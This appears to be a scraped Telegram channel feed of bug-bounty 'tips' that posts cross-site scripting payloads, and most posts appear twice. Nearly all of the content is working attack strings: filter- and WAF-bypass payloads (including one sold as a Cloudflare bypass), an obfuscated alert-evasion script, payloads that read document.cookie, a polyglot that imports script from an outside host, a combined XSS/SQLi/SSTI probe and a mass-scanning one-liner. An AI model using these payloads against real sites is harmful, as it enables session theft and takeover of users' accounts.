XSS Tip 🥵
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for XSS + SQLi + SSTI/CSTI !
#XSS #SQLI
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
'"><svg/onload=prompt(5);>{{7*7}}' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI#XSS #SQLI
Please open Telegram to view this post
VIEW IN TELEGRAM
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vulnBugCod3 ( ZIP )LearnExploit ( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload 💎
#xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)#xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
XSS could be be triggers in url itself, no need for parameter injection ⚡️
Payloads:
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payloads:
%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
short XSS polyglot
'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Stored XSS via cache poisoning ⚡️
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
CloudFlare XSS protection WAF Bypassed 💎
#WAF #XSS #Bypass #CloudFlare
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=confirm(document.cookie)>#WAF #XSS #Bypass #CloudFlare
——————
0Day.Today
@LearnExploit
@Tech_Army